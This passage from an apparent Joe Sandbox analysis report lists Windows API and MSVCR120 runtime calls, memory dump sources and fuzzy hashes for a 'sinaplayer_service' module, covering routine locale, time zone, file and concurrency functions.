                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(6D160C00,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0A8E0B
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,6D160C04,000000FF,6D0D4437,0000003F,00000000,?), ref: 6D0A8E84
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,6D160C58,000000FF,1CC48320,0000003F,00000000,?), ref: 6D0A8EBC
                                                                                                                                                                                                    • __timezone.MSVCR120 ref: 6D0A8EE3
                                                                                                                                                                                                    • __daylight.MSVCR120 ref: 6D0A8EED
                                                                                                                                                                                                    • __dstbias.MSVCR120 ref: 6D0A8EF7
                                                                                                                                                                                                    • strcmp.MSVCR120(00000000,00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0D66A5
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0D66BA
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0D66C1
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000001,00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0D66C8
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0D6709
                                                                                                                                                                                                    • free.MSVCR120(00000000,00000000,00000000,00000000,00000000,00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?), ref: 6D0D670F
                                                                                                                                                                                                    • strncpy_s.MSVCR120(6D0D4437,00000040,00000000,00000003), ref: 6D0D672A
                                                                                                                                                                                                    • atol.MSVCR120(-00000003), ref: 6D0D6747
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: strlen$ByteCharMultiWidefree$CriticalEnterInformationSectionTimeZone___lc_codepage_func__daylight__dstbias__timezone__tzname_get_daylight_get_dstbias_get_timezone_invoke_watson_lock_malloc_crt_mbsnbicollatolstrcmpstrncpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 427740661-0
                                                                                                                                                                                                    • Opcode ID: d2a1984b5f1a5e849a11ef40e0c46e8ee44f541ed75ef044ab6e4adf970c08f3
                                                                                                                                                                                                    • Instruction ID: 2678a9a89e63f04cfd7bbb3081e73fcdbb98c3061fc1280e8104cf088490c58e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2a1984b5f1a5e849a11ef40e0c46e8ee44f541ed75ef044ab6e4adf970c08f3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50A1AE70D0838A9FFB05CFA9D940BBDBBF8BF0A314F55415AE120AB291D7758841CB64
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?), ref: 6D0FE082
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?), ref: 6D0FE08D
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,00000000,?), ref: 6D0FE0B0
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0FE0BA
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FE0D6
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FE0E3
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FE0F0
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FE115
                                                                                                                                                                                                      • Part of subcall function 6D0FD1A9: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,6D0FD935,?), ref: 6D0FD1CC
                                                                                                                                                                                                      • Part of subcall function 6D0FD1A9: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,?,6D0FD935,?), ref: 6D0FD1E0
                                                                                                                                                                                                      • Part of subcall function 6D0FD1A9: ___loctotime32_t.LIBCMT ref: 6D0FD20A
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FE124
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FE133
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(?,00000104,?,?,?,?), ref: 6D0FE164
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D0FE179
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,00000000,00000000,00000000,00000000,00000000), ref: 6D0FE18A
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,00000000,00000000,00000000,00000000,00000000), ref: 6D0FE195
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6D0FE1A8
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6D0FE1B3
                                                                                                                                                                                                    • memset.MSVCR120(00000000,00000000,00000010,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6D0FE1C2
                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,00000008,0000000C,00000004,00000000), ref: 6D0FE1F3
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 6D0FE1FE
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FE206
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$Time$___time64_t_from_ft_invalid_parameter_noinfo$ErrorFileLastSystem$DiskFindFreeLocalNextSpaceSpecific___loctotime32_t_invalid_parameter_invoke_watsonmemsetwcscpy_s
                                                                                                                                                                                                    • String ID: :\
                                                                                                                                                                                                    • API String ID: 2675026314-112054617
                                                                                                                                                                                                    • Opcode ID: b98c9624b59e97c3c2fbdedae5b7c82b33c4348f303d186d9a2064696e86e580
                                                                                                                                                                                                    • Instruction ID: cae70025f7276b990091c2dd9141c25f657067adb3b8955402a07b04fdc67eea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b98c9624b59e97c3c2fbdedae5b7c82b33c4348f303d186d9a2064696e86e580
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA51E6726042099BFB219FB4DC40BAEB7F8EF45314F11856AEE15CB280EB74D5818B61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,?,?,00000040), ref: 6D0A84ED
                                                                                                                                                                                                    • _wcsicmp.MSVCR120(0000009C,?), ref: 6D0A8502
                                                                                                                                                                                                    • _wcsnicmp.MSVCR120(0000009C,?,?), ref: 6D0A8529
                                                                                                                                                                                                    • _TestDefaultCountry.LIBCMT ref: 6D0A8544
                                                                                                                                                                                                    • wcslen.MSVCR120(?), ref: 6D0A8557
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(000002EC,00000055,?,00000001,?), ref: 6D0A8568
                                                                                                                                                                                                    • _getptd.MSVCR120 ref: 6D0A8597
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,?,?,00000040), ref: 6D0A85C0
                                                                                                                                                                                                    • _wcsicmp.MSVCR120(?,?), ref: 6D0A85DB
                                                                                                                                                                                                      • Part of subcall function 6D08F840: _wcsicmp_l.MSVCR120(?,?,00000000), ref: 6D08F858
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,?,?,00000080), ref: 6D0A861A
                                                                                                                                                                                                    • _wcsicmp.MSVCR120(0000009C,?), ref: 6D0A8633
                                                                                                                                                                                                    • wcslen.MSVCR120(?), ref: 6D0E0496
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(000002EC,00000055,?,00000001,?), ref: 6D0E04A7
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D0E04FF
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,2000000B,?,00000002,0000009C,?,6D0A809C,?,0000009C,?,00000000,00000055,00000000,?,6D0A81D9,?), ref: 6D0E0519
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoLocale__crt$_wcsicmp$wcslenwcsncpy_s$CountryDefaultTest_getptd_invoke_watson_wcsicmp_l_wcsnicmp
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2789717988-0
                                                                                                                                                                                                    • Opcode ID: 9aa5c89b637387dd49ea29af3f890408ec6f485ad170bdccdea43dc6cfffbac8
                                                                                                                                                                                                    • Instruction ID: 0b1e6fbd1666531865f6c405e0b543113469fec2fa0e49911cf707b6ed78da2d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9aa5c89b637387dd49ea29af3f890408ec6f485ad170bdccdea43dc6cfffbac8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD5104B25081569BFF048A75CD81BBA37ECFF01354F5880A9EE18DB086EF75CA408B64
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0A5D05: __EH_prolog3.LIBCMT ref: 6D0A5D0C
                                                                                                                                                                                                      • Part of subcall function 6D0A5D05: ??2@YAPAXI@Z.MSVCR120(00000090,0000000C,6D0A500E,E18D5491,?,00000180,?), ref: 6D0A5D35
                                                                                                                                                                                                    • ?GetProcessorNodeCount@Concurrency@@YAIXZ.MSVCR120(E18D5491,?,00000180,?), ref: 6D0A5027
                                                                                                                                                                                                      • Part of subcall function 6D0A44E0: __EH_prolog3.LIBCMT ref: 6D0A44E7
                                                                                                                                                                                                      • Part of subcall function 6D0A44FF: GetNumaHighestNodeNumber.KERNEL32(?,?,6D0A5034,E18D5491,?,00000180,?), ref: 6D0A4509
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,E18D5491,?,00000180,?), ref: 6D0A5059
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A50A3
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A50BB
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,?), ref: 6D0A50D1
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,?,?,00000180,?), ref: 6D0A50E4
                                                                                                                                                                                                    • Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 6D0A5160
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(000000C0), ref: 6D0A5250
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000088,?,00000000,00000000,?,?,00000000,000000C0,000000C0), ref: 6D0A52EB
                                                                                                                                                                                                      • Part of subcall function 6D0A4F63: ??2@YAPAXI@Z.MSVCR120(0000000C,?,00000000,00000000,00000000,00000000,?,6D0A53A3,?,?,?,?,?,?,?,00000000), ref: 6D0A4F88
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,00000000,00000000,?,?,00000000,000000C0,000000C0), ref: 6D0A53E5
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000180,?), ref: 6D0A542F
                                                                                                                                                                                                    • __crtCreateSemaphoreExW.MSVCR120(00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,?,?,?,?,00000180,?), ref: 6D0A54A1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@$H_prolog3NodeQuickmemset$Concurrency::details::Concurrency@@Count@CreateHighestNumaNumberProcessorSemaphoreSet::__crtfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1225761749-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,00001004,?,00000002,?,?,00000000), ref: 6D0A19EA
                                                                                                                                                                                                    • free.MSVCR120(00006A69), ref: 6D0A1A0D
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D0A1BBB
                                                                                                                                                                                                    • strncpy_s.MSVCR120(00000000,?,00000000,?), ref: 6D0A1BDB
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,00001004,00000000,00000000,?,?,00000000), ref: 6D0A1C46
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000000,00000002,?,?,?,00000000), ref: 6D0A1C5B
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,00001004,00000000,00000000,?,?,?,00000000), ref: 6D0A1C77
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0DF249
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoLocale__crt$_calloc_crtfree$strncpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2184820072-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _getptd.MSVCR120(?,00000000,00000055,00000000,?,6D0A81D9,?,?,?,?,00000000,00000000,00000000), ref: 6D0A803D
                                                                                                                                                                                                      • Part of subcall function 6D0A83EE: __crtGetUserDefaultLocaleName.MSVCR120(?,00000055,0000009C), ref: 6D0A8415
                                                                                                                                                                                                      • Part of subcall function 6D0A83EE: wcslen.MSVCR120(?,0000009C), ref: 6D0A8428
                                                                                                                                                                                                      • Part of subcall function 6D0A83EE: wcsncpy_s.MSVCR120(?,00000055,?,00000001,?,0000009C), ref: 6D0A843F
                                                                                                                                                                                                      • Part of subcall function 6D0A7FE9: wcscmp.MSVCR120(?,ACP,0000009C,?,6D0A809C,?,0000009C,?,00000000,00000055,00000000,?,6D0A81D9,?,?,?), ref: 6D0A8008
                                                                                                                                                                                                      • Part of subcall function 6D0A7FE9: wcscmp.MSVCR120(?,OCP,0000009C,?,6D0A809C,?,0000009C,?,00000000,00000055,00000000,?,6D0A81D9,?,?,?), ref: 6D0A801D
                                                                                                                                                                                                      • Part of subcall function 6D0A7FE9: _wtol.MSVCR120(?,0000009C,?,6D0A809C,?,0000009C,?,00000000,00000055,00000000,?,6D0A81D9,?,?,?), ref: 6D0A802D
                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,00000000,00000055,00000000,?,6D0A81D9,?,?,?,?,00000000,00000000,00000000), ref: 6D0A80C4
                                                                                                                                                                                                    • wcslen.MSVCR120(?,?,6D0A81D9,?,?,?,?,00000000,00000000,00000000), ref: 6D0A80F4
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(6D0A82F9,00000055,?,00000001,?,?,6D0A81D9,?,?,?,?,00000000,00000000,00000000), ref: 6D0A8101
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(6D0A82F9,00001001,6D0A81D9,00000040,?,6D0A81D9,?,?,?,?,00000000,00000000,00000000), ref: 6D0A811A
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(6D0A82F9,00001002,6D0A8259,00000040,?,?,?,?,?,6D0A81D9,?,?,?,?,00000000,00000000), ref: 6D0A813F
                                                                                                                                                                                                    • wcschr.MSVCR120(6D0A8259,0000005F,?,?,?,?,?,?,?,?,?,6D0A81D9,?,?,?), ref: 6D0A8152
                                                                                                                                                                                                    • wcschr.MSVCR120(6D0A8259,0000002E,?,?,?,?,?,?,?,?,?,6D0A81D9,?,?,?), ref: 6D0A8164
                                                                                                                                                                                                    • _itow_s.MSVCR120(00000000,6D0A82D9,00000010,0000000A), ref: 6D0A817F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale__crt$Infowcschrwcscmpwcslenwcsncpy_s$CodeDefaultNamePageUserValid_getptd_itow_s_wtol
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2649615383-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcscmp.MSVCR120(?,ACP,0000009C,?,6D0A809C,?,0000009C,?,00000000,00000055,00000000,?,6D0A81D9,?,?,?), ref: 6D0A8008
                                                                                                                                                                                                    • wcscmp.MSVCR120(?,OCP,0000009C,?,6D0A809C,?,0000009C,?,00000000,00000055,00000000,?,6D0A81D9,?,?,?), ref: 6D0A801D
                                                                                                                                                                                                    • _wtol.MSVCR120(?,0000009C,?,6D0A809C,?,0000009C,?,00000000,00000055,00000000,?,6D0A81D9,?,?,?), ref: 6D0A802D
                                                                                                                                                                                                      • Part of subcall function 6D09C8E3: wcstol.MSVCR120(?,00000000,0000000A,?,6D1299C5,?,?,?,6D129BDB,?,00000000), ref: 6D09C8ED
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,20001004,?,00000002,0000009C,?,6D0A809C,?,0000009C,?,00000000,00000055,00000000,?,6D0A81D9,?), ref: 6D0B3813
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,2000000B,?,00000002,0000009C,?,6D0A809C,?,0000009C,?,00000000,00000055,00000000,?,6D0A81D9,?), ref: 6D0E0519
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoLocale__crtwcscmp$_wtolwcstol
                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                    • API String ID: 1531225338-711371036
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcscmp.MSVCR120(?,ACP,?,?,6D129BDB,?,00000000), ref: 6D129982
                                                                                                                                                                                                    • wcscmp.MSVCR120(?,OCP,?,?,6D129BDB,?,00000000), ref: 6D129993
                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,6D129BDB,?,00000000), ref: 6D1299AF
                                                                                                                                                                                                    • _wtol.MSVCR120(?,?,?,6D129BDB,?,00000000), ref: 6D1299C0
                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,6D129BDB,?,00000000), ref: 6D1299D9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoLocalewcscmp$_wtol
                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                    • API String ID: 3515354035-711371036
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0F0FCE: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCMT ref: 6D0F0FF8
                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::AdjustAllocationIncrease.LIBCMT ref: 6D0F1EF0
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 6D0F1F65
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCMT ref: 6D0F1F94
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 6D0F1FBE
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCMT ref: 6D0F1FC7
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 6D0F1FDC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::$Manager::Resource$Cores$AllocationCoreDistributePrepareReceiversTransfer$AdjustBorrowedDataExclusiveGlobalHandleIdleIncreaseProxy::ResetScheduler
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 912522943-0
                                                                                                                                                                                                    • Opcode ID: 0794facf088872c7d98497a5bf15cc8704173fadcf00802c4ad8f689fd845be9
                                                                                                                                                                                                    • Instruction ID: 96c6477026ffec008c7fab0ee5a418a873cf15e405e0680531321199230fcd6e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0794facf088872c7d98497a5bf15cc8704173fadcf00802c4ad8f689fd845be9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68915BB1E04216DFDB08CF69C594A6DB7F6FF48304B2186ADD845AB745C730E992CB82
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0A3AF4: TlsGetValue.KERNEL32(6D0A3DF7,00000000,00000000,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A3AFA
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120 ref: 6D0ED8C3
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E7774,6D15CF5C), ref: 6D0ED8F1
                                                                                                                                                                                                      • Part of subcall function 6D0EDCC4: ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR120(00000000), ref: 6D0EDCE1
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000004,?,00000000), ref: 6D0ED8DC
                                                                                                                                                                                                      • Part of subcall function 6D0F3BC9: __EH_prolog3_catch.LIBCMT ref: 6D0F3BD0
                                                                                                                                                                                                      • Part of subcall function 6D0F3BC9: InterlockedPopEntrySList.KERNEL32(?,?,?,6D0D3091,00000000,00000000), ref: 6D0F3BF1
                                                                                                                                                                                                      • Part of subcall function 6D0F3BC9: __crtGetTickCount64.MSVCR120(?,?,?,6D0D3091,00000000,00000000), ref: 6D0F3C14
                                                                                                                                                                                                    • Concurrency::details::WorkItem::BindTo.LIBCMT ref: 6D0ED983
                                                                                                                                                                                                      • Part of subcall function 6D0F669C: Concurrency::details::InternalContextBase::PrepareForUse.LIBCMT ref: 6D0F66BE
                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCMT ref: 6D0ED9B0
                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCMT ref: 6D0ED9CE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::$Base::ContextInternal$??0exception@std@@ReleaseSchedulerSpin$BindConcurrency@@Count64EntryExceptionH_prolog3_catchInterlockedItem::ListOnce@?$_PrepareThrowTickValueWait@$00@details@Work__crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1328105426-0
                                                                                                                                                                                                    • Opcode ID: bba2134e52d1dc77fde887062536dd3a64a60da074788588e1c1fce72c7d673f
                                                                                                                                                                                                    • Instruction ID: 8672ed8e80dc3f408ae1bbd66cfe0828a865737a4d818877679d7ee35c45359b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bba2134e52d1dc77fde887062536dd3a64a60da074788588e1c1fce72c7d673f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E051B172A14115AFE708DFA4CC80FBDB378FF85754F018259EA2667291DB71AD05CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6D09CBBA,00000010,?,00000000,0000000A,00000000), ref: 6D0D4166
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,6D09CBBA,00000010,?,00000000,0000000A,00000000), ref: 6D0D4170
                                                                                                                                                                                                    • _errno.MSVCR120(762306A0,?,00000000,?,6D09CBBA,00000010,?,00000000,0000000A,00000000), ref: 6D0D417C
                                                                                                                                                                                                    • _errno.MSVCR120(762306A0,?,00000000,?,6D09CBBA,00000010,?,00000000,0000000A,00000000), ref: 6D0D4186
                                                                                                                                                                                                    • _errno.MSVCR120(0000000A,762306A0,?,00000000,?,6D09CBBA,00000010,?,00000000,0000000A,00000000), ref: 6D0D41AA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(762306A0,?,00000000,?,6D09CBBA,00000010,?,00000000,0000000A,00000000), ref: 6D0D41B1
                                                                                                                                                                                                    Memory Dump Source
